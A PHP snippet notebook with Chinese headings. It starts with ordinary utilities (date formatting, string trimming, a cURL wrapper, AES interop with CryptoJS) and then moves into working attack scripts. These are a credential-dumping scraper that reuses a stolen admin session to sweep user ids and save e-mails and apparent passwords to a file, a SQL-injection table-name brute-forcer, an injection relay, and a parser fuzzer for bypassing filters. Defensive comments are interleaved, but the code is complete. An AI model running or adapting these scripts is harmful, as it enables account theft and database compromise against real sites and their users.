php mark

#php 日期转换成TZ格式

# Current UTC time in ISO 8601 form, with the "Z" (Zulu) designator in place of "+00:00".
$time_tz_str = gmdate('Y-m-d\TH:i:s\Z', time());
# e.g. 2020-07-21T12:11:11Z

#trim 移除字符串

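/**
 * Strip one leading and one trailing occurrence of $removestring from $string.
 *
 * $removestring is matched as literal text. It is passed through preg_quote()
 * before being placed in the pattern, so regex metacharacters or the "/"
 * delimiter in the value can neither change what is matched nor break the
 * pattern. This matters whenever the value is not a hard-coded constant.
 *
 * @param mixed $string        subject; returned unchanged when it is not a string
 * @param mixed $removestring  literal text to strip; non-strings leave $string unchanged
 * @return mixed the stripped string, or the original value when either argument is not a string
 */
function strim($string,$removestring){
    if (!is_string($string) || !is_string($removestring)){
        return $string;
    }
    // Nothing to strip: the unquoted pattern /^|$/ was a no-op as well.
    if ($removestring === ''){
        return $string;
    }
    $needle = preg_quote($removestring, '/');
    $result = preg_replace("/^{$needle}|{$needle}$/", "", $string);
    return $result;
}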

#这样改strim会更好一点
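/**
 * Strip one leading and one trailing occurrence of $removestring from $string,
 * or trim surrounding whitespace when no $removestring is given.
 *
 * $removestring is matched as literal text: it goes through preg_quote() before
 * being placed in the pattern, so regex metacharacters or the "/" delimiter in
 * the value cannot alter or break the pattern.
 *
 * @param mixed $string        subject; returned unchanged when it is not a string
 * @param mixed $removestring  literal text to strip; empty/falsy means "trim whitespace"
 * @return mixed the stripped string, or the original value when $string is not a string
 */
function strim($string,$removestring=''){
    if (!is_string($string)){
        return $string;
    }
    // '0' is falsy in PHP but is a legitimate string to strip, so exclude it here.
    if (!$removestring && $removestring !== '0'){
        return trim($string);
    }
    $needle = preg_quote((string) $removestring, '/');
    $result = preg_replace("/^{$needle}|{$needle}$/", "", $string);
    return $result;
}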

#curl request

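/**
 * Send an HTTP(S) request with cURL and return the response.
 *
 * A non-empty $post switches the request to POST with $post as the body;
 * a non-empty $cookie is sent as the Cookie request header. Redirects are
 * followed and the request times out after 10 seconds.
 *
 * NOTE(review): $url is handed to cURL as-is. If callers can pass a
 * user-influenced URL, it should be validated against an allow-list before it
 * reaches this function, because the function follows redirects itself.
 * NOTE(review): confirm whether the Cookie value set here is replayed to
 * redirect targets on other hosts in the libcurl version in use.
 *
 * @param string       $url          request URL
 * @param string|array $post         POST body; empty means GET
 * @param string       $cookie       Cookie header value; empty means none
 * @param int|bool     $returnCookie when truthy, response headers are captured and parsed
 * @return string|array the response body; or ['cookie' => ..., 'content' => ...] when
 *                      $returnCookie is truthy; or the cURL error message on failure
 */
function curl_request($url,$post='',$cookie='', $returnCookie=0){
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)');
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
    curl_setopt($curl, CURLOPT_REFERER, "http://XXX");
    if($post) {
        curl_setopt($curl, CURLOPT_POST, 1);
        //curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
    }
    if($cookie) {
        curl_setopt($curl, CURLOPT_COOKIE, $cookie);
    }
    curl_setopt($curl, CURLOPT_HEADER, $returnCookie);
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    // HTTPS works without disabling verification. Turning VERIFYPEER off (as the
    // original did) accepts any certificate, so the cookie and POST body can be
    // read or altered by anyone in the network path. Keep both checks on; for a
    // private CA, point CURLOPT_CAINFO at its bundle instead of disabling them.
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, true);
    $data = curl_exec($curl);
    if (curl_errno($curl)) {
        // Callers receive the error text in place of a body (unchanged contract);
        // the handle is now released on this path too.
        $error = curl_error($curl);
        curl_close($curl);
        return $error;
    }
    // With redirects followed, the response holds one header block per hop, so
    // split on the header size cURL reports, not on the first blank line.
    $headerSize = curl_getinfo($curl, CURLINFO_HEADER_SIZE);
    curl_close($curl);
    if($returnCookie){
        $header = (string) substr($data, 0, $headerSize);
        $body = (string) substr($data, $headerSize);
        $info = array('cookie' => '', 'content' => $body);
        // First Set-Cookie name=value pair; header names are case-insensitive and
        // a cookie may come without attributes (no trailing ';').
        if (preg_match('/^Set-Cookie:\s*([^;\r\n]*)/mi', $header, $matches)) {
            $info['cookie'] = trim($matches[1]);
        }
        return $info;
    }else{
        return $data;
    }
}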

#php remove bom str

/**
 * Drop a leading UTF-8 byte-order mark (bytes EF BB BF) from $str.
 *
 * @param string $str input text
 * @return string $str without the BOM, or $str unchanged when it has none
 */
function str_remove_bom($str){
    $bom = "\xEF\xBB\xBF";
    if (strncmp($str, $bom, 3) !== 0) {
        return $str;
    }
    return substr($str, 3);
}

#php实现内存地址反转

/**
 * Reverse the byte order of a hex string (two hex digits per byte), e.g. to
 * switch between little-endian and big-endian notation of a memory value.
 *
 * @param string $hex hex digits
 * @return string the two-character chunks in reverse order
 */
function array_endtostart($hex){
	return implode("", array_reverse(str_split($hex, 2)));
}

#php 实现汇编中的pxor

/**
 * Byte-wise XOR of two hex strings, returning the result as hex
 * (the operation the assembly PXOR instruction performs on its operands).
 *
 * Both inputs are split into two-digit chunks and $a drives the iteration, so
 * $b is expected to be at least as long as $a.
 *
 * @param string $a hex digits
 * @param string $b hex digits
 * @return string hex digits of $a XOR $b
 */
function xortnew($a,$b){
	$left = str_split($a, 2);
	$right = str_split($b, 2);
	$pieces = array();
	for ($i = 0, $n = count($left); $i < $n; $i++) {
		$pieces[] = bin2hex(hex2bin($left[$i]) ^ hex2bin($right[$i]));
	}

	return implode("", $pieces);
}
# Demo call: every byte of the first operand is XORed with 0x0c; prints "322d372d383130320c0c0c0e29366c00".
var_dump(xortnew("3e213b21343d3c3e00000002253a600c","0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c"));

#php 查找字符串与替换

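/**
 * Inside each <pre>…</pre> block of $str, turn tabs into four &nbsp; entities
 * and decode a few character entities back to literal characters.
 *
 * NOTE(review): in the published listing three of the search patterns appear to
 * have been entity-decoded by the blog renderer (one line was no longer valid
 * PHP). "&#35;", "&quot;" and "&#039;" below are the presumed originals —
 * confirm against the author's source.
 * NOTE(review): the decoded quotes are only safe where the result is emitted
 * as element text; do not reuse the output inside an HTML attribute.
 *
 * @param string $str HTML fragment
 * @return string the fragment with the <pre> blocks rewritten
 */
function tapreplace($str){
    // Lazy quantifier: each <pre> block is handled on its own. The greedy form
    // ran from the first <pre to the last </pre> and rewrote the text between.
    $newstr=preg_replace_callback("/(<pre.*?<\/pre>)/s",function ($match){
        // Literal replacements, applied in the listed order.
        return str_replace(
            array("\t", "&#39;", "&#35;", "&quot;", "&#039;"),
            array("&nbsp;&nbsp;&nbsp;&nbsp;", "'", "#", "\"", "'"),
            $match[0]
        );
    },$str);
    // preg_replace_callback() returns null on a PCRE error; fall back to the input.
    return $newstr === null ? $str : $newstr;
}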

#dokuwiki在php7下报operator not supported for strings in 错

inc\lessc.inc.php

	public $importDir = '';
#改为
	public $importDir = array();

#CryptoJS 与php互通

#CryptoJS 中
#128位AES加密
// 16 random bytes each for the AES-128 key and the IV.
// NOTE(review): confirm the crypto-js release in use draws WordArray.random() from a
// CSPRNG; releases before 4.0 are reported to use Math.random().
var key = CryptoJS.lib.WordArray.random(16);
var iv =  CryptoJS.lib.WordArray.random(16);
// The key is a WordArray, not a passphrase string, so it is used directly as the AES key.
// No mode is given; presumably the library default (CBC with PKCS#7 padding) applies, which
// matches 'aes-128-cbc' on the PHP side. CBC alone carries no integrity protection.
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
        // Placeholders: the hex forms of the key and IV generated on the CryptoJS side.
        // hex2bin() returns false on malformed hex; aes-128 needs exactly 16 key bytes, and
        // PHP silently zero-pads or truncates a key of the wrong length, so validate both.
        $key_str = hex2bin('xxxxxxx');
        $iv_str = hex2bin('xxxxxxx');
        // Placeholder for the ciphertext (base64, given the options value used below).
        $str="xxxxx";
        // NOTE(review): the 4th argument is the integer $options bitmask; false is coerced to 0,
        // i.e. base64 input with PKCS#7 padding. openssl_decrypt() returns false on failure,
        // so test the result with === false. CBC is unauthenticated: verify a MAC over IV and
        // ciphertext before decrypting (or use an AEAD mode) if the data crosses a trust boundary.
        $result =openssl_decrypt($str,'aes-128-cbc',$key_str,false,$iv_str);

#192 aes
// 24 random key bytes select AES-192; the IV is always one AES block (16 bytes).
// NOTE(review): confirm the crypto-js release in use draws WordArray.random() from a CSPRNG.
var key = CryptoJS.lib.WordArray.random(24);
var iv =  CryptoJS.lib.WordArray.random(16);
// WordArray key: used directly as the AES key. The result is not integrity-protected.
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
        // Placeholders for the hex-encoded 24-byte key and 16-byte IV from the CryptoJS side;
        // check the hex2bin() results and the key length before use.
        $key_str = hex2bin('xxxxxxx');
        $iv_str = hex2bin('xxxxxxx');
        // Placeholder for the base64 ciphertext.
        $str="xxxxx";
        // NOTE(review): the 4th argument is the integer $options bitmask (false is coerced to 0).
        // The call returns false on failure, and CBC gives no integrity protection.
        $result =openssl_decrypt($str,'aes-192-cbc',$key_str,false,$iv_str);


#256 aes:

// 32 random key bytes select AES-256; the IV is always one AES block (16 bytes).
// NOTE(review): confirm the crypto-js release in use draws WordArray.random() from a CSPRNG.
var key = CryptoJS.lib.WordArray.random(32);
var iv =  CryptoJS.lib.WordArray.random(16);
// WordArray key: used directly as the AES key. The result is not integrity-protected.
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
        // Placeholders for the hex-encoded 32-byte key and 16-byte IV from the CryptoJS side;
        // check the hex2bin() results and the key length before use.
        $key_str = hex2bin('xxxxxxx');
        $iv_str = hex2bin('xxxxxxx');
        // Placeholder for the base64 ciphertext.
        $str="xxxxx";
        // NOTE(review): the 4th argument is the integer $options bitmask (false is coerced to 0).
        // The call returns false on failure, and CBC gives no integrity protection.
        $result =openssl_decrypt($str,'aes-256-cbc',$key_str,false,$iv_str);

#php try catch warning

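// Turn PHP warnings and notices into ErrorException so they can be handled with try/catch.
// The fifth handler argument ($errcontext) is no longer passed by PHP 8, so it must be
// optional; a required parameter makes every handled error fail with ArgumentCountError.
set_error_handler(function($errno, $errstr, $errfile, $errline, $errcontext = null) {
    // Skip errors excluded by the current error_reporting mask. This covers the @-operator
    // on every PHP version: PHP 7 reports a mask of 0 while @ is active, PHP 8 reports a
    // mask holding only the fatal error types.
    if (!(error_reporting() & $errno)) {
        return false;
    }

    throw new ErrorException($errstr, 0, $errno, $errfile, $errline);
});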


#然后直接try就可以了
        // Fragment: $rule, $result and $end come from surrounding code that is not shown.
        // It relies on an error handler that throws ErrorException, so that a warning from
        // preg_match() (for example a malformed pattern) lands in the catch block.
        try{
            // $rule is interpolated between "/" delimiters as a regular expression, so a rule
            // containing an unescaped "/" or invalid syntax raises a warning here.
            // NOTE(review): if rules can come from an untrusted source, a crafted pattern can
            // also be very expensive to evaluate — confirm where $rule originates.
            if (preg_match("/{$rule}/", $result['url'])) {
                $end['match']=1;
                $end['code_error']=0;
            }
            // Loose comparison: matches both the integer 404 and the string "404".
            if ($result['code'] == 404) {
                $end['code_error']=1;
            }
        }catch (Exception $e){
            // Dumps the offending rule to the output; the exception itself is discarded.
            var_dump($rule);
        }

#数组对象转换

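/**
 * Convert an array to an object, recursing into nested arrays.
 *
 * Nested arrays become stdClass objects. Values that are already objects are
 * kept as they are: the previous version passed them to the array-only
 * recursion, which returned null and replaced them with empty objects.
 *
 * @param array $arr the array to convert
 * @return object|null the converted object, or null when $arr is not an array
 */
function array_to_object($arr)
{
    if (!is_array($arr))
    {
        return null;
    }
    foreach ($arr as $k => $v)
    {
        if (is_array($v))
        {
            $arr[$k] = array_to_object($v);
        }
    }

    return (object)$arr;
}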
 
/**
 * Convert an object to an array, recursing into nested objects and arrays.
 *
 * The conversion uses an (array) cast, so non-public properties of an object
 * are included too (PHP prefixes their keys with NUL-delimited markers). Keep
 * that in mind before serialising the result or returning it to a client.
 *
 * @param object|array $obj value to convert
 * @return array|null the converted array; null as soon as a resource is found among the
 *                    values (the recursive call then casts that null to an empty array)
 */
function object_to_array($obj)
{
    $converted = (array)$obj;
    foreach ($converted as $key => $value)
    {
        if (is_resource($value))
        {
            return null;
        }
        if (is_object($value) || is_array($value))
        {
            $converted[$key] = (array)object_to_array($value);
        }
    }

    return $converted;
}

#一个无极限分类

/**
 * Build a nested category tree from a flat list of rows.
 *
 * Each row is read through the keys 'pro_id' (own id) and 'pid' (parent id).
 * Parents are looked up with $result[$item['pid']], so $result is presumably
 * keyed by pro_id — verify against the caller.
 *
 * @param array $result flat rows
 * @return array the rows without a known parent; children hang under the 'son' key
 */
function get_tree($result){
        $tree = array();
        foreach($result as $item){
            if(isset($result[$item['pid']])){
                // Parent exists: attach this row to the parent's 'son' list by reference,
                // so children added to this row later still show up under the parent.
                $result[$item['pid']]['son'][] = &$result[$item['pro_id']];
            }else{
                // No such parent in the list: the row is a root of the tree.
                $tree[] = &$result[$item['pro_id']];
            }
        }
        return $tree;

}

//生成无极限的数据

//用递归展示处理的数据
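    /**
     * Recursively print a category tree as HTML, one node per line, indented by depth.
     *
     * Node names are HTML-escaped before output: they come from stored data, and
     * echoing them raw would let a name containing markup run as script in the
     * viewer's browser.
     *
     * @param array $data   nodes; each has 'pro_name' and optionally a 'son' list of child nodes
     * @param int   $level  current depth, 0 for the roots
     * @return void
     */
    function getviewdata($data,$level=0){
            foreach($data as $key=>$value){
                // One indent unit per depth level, plus one for the root level.
                echo str_repeat('&emsp;&emsp;', $level + 1);
                echo htmlspecialchars((string) $value['pro_name'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
                echo '<br>';
                if(!empty($value['son'])){
                    getviewdata($value['son'],$level+1);
                }
            }
    }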
    // $xx is not defined in this listing; presumably the tree returned by get_tree() — confirm.
    getviewdata($xx);




#某脱库脚本

/**
 * Fetch the admin order page for user id $i and scrape it.
 *
 * What the code shows, read from the defender's side:
 *  - The admin endpoint takes the target uid in the URL, and the only credential
 *    sent is one fixed PHPSESSID cookie. Whoever holds that session can read any
 *    user's orders, so the server needs per-record authorization, short-lived
 *    admin sessions bound to the client, and revocation when a session leaks.
 *  - The User-Agent, Referer and cookie are constants, so all requests from this
 *    script look identical in access logs apart from the uid.
 *
 * @param int $i user id placed in the request URL
 * @return array ['email' => ..., 'pid' => [...]] or an empty array when nothing was parsed
 */
function getuidinfo($i){
// sleep() takes whole seconds, so 0.5 is truncated to 0 and no pause takes place.
sleep(0.5);
$url="http://www.xxx.cn/admin.php?s=/product/order/index/uid/{$i}";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx');
curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24');
curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77');
$output = curl_exec($ch);
curl_close($ch);
// Keep only the table body of the returned page.
preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result);
if(!isset($result[0][0]) || !$result[0][0]){
return array();
}
$tmp_array= explode("\n",$result[0][0]);
if(!$tmp_array){
return array();
}

$result_out=array();
foreach ($tmp_array as $a_tmp){
$a_tmp = trim($a_tmp);
// Only lines that start with a numeric first cell are treated as data rows.
if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){
continue;
}

// Capture 1 is the third cell (collected as a product id), capture 2 the link text of
// the seventh cell (used as the account name / e-mail).
preg_match('#^<td>\d+</td><td>.*</td><td>(.*)</td><td>\d+\.\d+</td><td>[^<]*</td><td>[^<]*</td><td><a[^>]*>([^<]*)</a></td>#',$a_tmp,$a_result);
$result_out[]=$a_result[1];
$account_name = $a_result['2'];
}
if (!isset($account_name)){
return array();
}
$result_out=array_unique($result_out);

$return['email']=$account_name;
$return['pid']=$result_out;

return $return;
}


/**
 * Query the admin user-search page with $product_id as keyword and return one table cell.
 *
 * Defender's reading: the value taken from the fourth column is handled as a
 * password by the calling loop. If that is what the page shows, the admin panel
 * renders stored credentials in clear text. Credentials should be stored only as
 * salted hashes and never be displayed, so that a leaked admin session cannot
 * expose them.
 *
 * @param mixed $product_id value placed in the keyword query parameter
 * @return mixed the captured cell text of the last matching row, or an empty array
 */
function getproduct($product_id){
// sleep() takes whole seconds, so 0.5 is truncated to 0 and no pause takes place.
sleep(0.5);
$url="http://www.xxx.cn/admin.php?s=/product/user/index&keyword={$product_id}";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx');
curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24');
curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77');
$output = curl_exec($ch);
curl_close($ch);
// Keep only the table body of the returned page.
preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result);
if(!isset($result[0][0]) || !$result[0][0]){
return array();
}
$tmp_array= explode("\n",$result[0][0]);
if(!$tmp_array){
return array();
}
$result=array();
foreach ($tmp_array as $a_tmp){
$a_tmp = trim($a_tmp);
// Only lines that start with a numeric first cell are treated as data rows.
if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){
continue;
}

// Capture 1 is the fourth cell; each matching row overwrites the previous value.
preg_match('#^<td>\d+</td><td><a[^>]*>[^<]*</a></td><td>[^<]*</td><td>([^<]*)</td>#',$a_tmp,$a_result);
$result=$a_result[1];
}
if(!$result){
return array();
}
return $result;

}

// Driver loop: walks user ids 1..32166 in order and appends one line per user to pwd.txt.
// Defender's reading: in the admin access log this is a strictly sequential uid sweep from
// one session, each hit followed by keyword searches. It is easy to alert on (per-session
// request rate, count of distinct uids per session) and to stop with rate limits plus
// re-authentication for bulk access to user records.
for($i=1;$i<32167;$i++){
$uidinfo = getuidinfo($i);
if(!$uidinfo){
continue;
}
echo $i."\n";
$strs = "uid:{$i} email:".$uidinfo['email'].":";
$pwd_tmp=array();
foreach($uidinfo['pid'] as $pid){
$pwd = getproduct($pid);
if(!$pwd){
continue;
}
$pwd_tmp[]=$pwd;
}
$pwd_tmp=array_unique($pwd_tmp);
$pwd_str =implode("|",$pwd_tmp);
$strs .=$pwd_str."\n";

// The flag value 8 is FILE_APPEND.
file_put_contents("pwd.txt",$strs,8);
// sleep() takes whole seconds, so 0.5 is truncated to 0 and no pause takes place.
sleep(0.5);
}

#thinkphp路由模式

http://www.xxx.net/product/index/xxx/id/29192
=>
http://www.xxx.net/index.php?m=product&c=index&a=xxx&id=29192

#跑表名

// Reads candidate names from the local file "tables" and requests one URL per name, with
// a UNION SELECT appended to the numeric id path segment. A response without the substring
// "exist" is printed as a hit.
// Defender's reading: this only works because the application concatenates the id segment
// into its SQL. The fix is to bind the id as a parameter (and reject non-integer ids) and to
// return a generic error page in place of database error text. In logs the requests stand
// out through "union select" and the "ss_" table prefix inside the path.
set_time_limit(0);
$tables = file("tables");

foreach ($tables as $a_tables){
$a_tables = trim($a_tables);
$url = "http://www.xxx.net/product/index/xxx/id/29192) and 1=1 and 1=2 union select 29192,29192,29192,2,2,4,5,(select id from ss_{$a_tables} where id>1 limit 0,1 ),7,8,9,10,2 -- a";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4');
$output = curl_exec($ch);
curl_close($ch);

// Presumably "exist" is part of the database's "table doesn't exist" error text — confirm.
$garbage = strstr($output, "exist");
if($garbage == false) 
{
echo $a_tables."<br>";
} 
sleep(2);

}

#inject

// Relay script: copies its own "id" query parameter into the id path segment of a second
// URL and prints whatever that URL returns.
// Defender's reading: the relayed request carries one fixed PHPSESSID and comes from the
// relay's address, so the real client never shows up in the target's logs. The relay itself
// forwards $_GET['id'] without validation and echoes the upstream body unescaped, so it
// must not be reachable by anyone but its operator.
$i = $_GET['id'];
sleep(1);
$url = "http://xxx.xxx.net/xxx/index/xxx/id/29192) and 1={$i} --";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4');
$output = curl_exec($ch);
curl_close($ch);
print_r($output);

#fuzz1

<?php
// Local experiment: for every pair of byte values 0..254, place the two bytes between the
// schema and table identifiers of a fixed query and report the pairs the MySQL parser still
// accepts.
// Defender's reading: an input filter has to treat as separators whatever byte sequences
// the database parser accepts, so a pattern-based filter cannot replace parameterised queries.
// NOTE(review): the root account with a trivial password is hard-coded; use a throwaway,
// least-privilege account on an isolated test instance.
$con=mysqli_connect("localhost","root","123456","test"); 
// NOTE(review): mysqli_connect_errno() takes no parameters; PHP 8 rejects the extra argument.
if (mysqli_connect_errno($con)) 
{ 
   echo 111;
	exit;
} 


for($i=0;$i<255;$i++) {

	for($j=0;$j<255;$j++) {

$char_str = chr($i);
$charj_str = chr($j);
$strs = "select count(*) from `information_schema`{$char_str}{$charj_str}`SCHEMATA`";
$result=mysqli_query($con,$strs);
$posts = array();
// mysqli_query() returns false when the statement does not parse; the @ hides the
// resulting warning on PHP 7 (PHP 8 throws a TypeError that @ does not suppress).
while($row = @mysqli_fetch_array($result)) {
    $posts[] = $row;
} 
// 10 is presumably the number of schemas on the author's test server — confirm.
if(isset($posts[0]) && $posts[0][0]==10 ){
echo "<font color=red>aaaa</font>{$i}|{$j}<br>";
}


	}

}  


mysqli_close($con);

#毫秒

# microtime() returns "fraction seconds"; split it into its two parts.
[$usec, $sec] = explode(" ", microtime());
# Millisecond part of the current second, zero-padded to three digits.
$lusec = sprintf('%03d', $usec * 1000);
